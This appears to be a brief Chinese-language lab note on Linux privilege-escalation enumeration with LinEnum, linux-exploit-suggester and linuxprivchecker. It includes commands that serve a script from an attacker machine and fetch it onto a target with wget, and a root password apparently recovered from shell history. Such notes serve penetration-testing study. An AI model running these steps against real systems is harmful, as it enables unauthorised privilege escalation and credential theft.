1. LinEnum的使用
这个脚本是用来收集系统的信息,如:特殊文件的权限、suid文件信息、网络端口信息。
sudo python -m SimpleHTTPServer 80
下载文件执行 wget http://192.168.0.109/LinEnum.sh
历史记录找到 root 密码 yanisy123
2. linux-exploit-suggester的使用
这个用来检测是否存在提权cve漏洞
下载文件执行 wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
3. linuxprivchecker.py
这个用来检测权限
python linuxprivchecker.py
可以从gethub上下载:https://github.com/sleventyeleven/linuxprivchecker